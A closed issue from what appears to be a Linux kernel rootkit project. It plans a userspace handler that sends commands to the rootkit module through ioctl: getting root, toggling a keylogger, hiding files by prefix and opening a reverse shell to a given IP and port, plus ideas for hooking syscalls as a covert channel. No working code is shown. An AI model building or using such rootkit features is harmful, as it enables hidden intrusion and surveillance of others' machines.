Closed alichtman closed 5 years ago
Solution
Write a userspace C program that acts as a handler to interface with the rootkit LKM using `ioctl`.
During setup, this binary will need to be compiled and moved to `/<ROOTKIT_NAME>`.
`$ /garden root` will be the command to get root.
`$ /garden keylogger [enable/disable]` will toggle the keylogger.
`$ /garden hide add PREFIX` will add a prefix to the hide list.
`$ /garden hide rm PREFIX` will remove a prefix from the hide list.
`$ /garden hide list` will show prefixes in the hide list.
`$ /garden rev_tcp IP PORT` will open a reverse shell.
Need to add color!
Hook a syscall that passes a pointer (for a pointer to the action_task struct), and has one other parameter we can use as a signal to the rootkit that the next call to this function is a command.
Get `msgctl` working.
We now need a way to communicate with the rootkit that isn't writing to the param files, as those no longer exist.
A few options are:
`$ kill <MAGIC_PID>`
`$ cat <MAGIC_FILE>`
The blocker is figuring out how to hook any of these commands.
`ioctl` maybe?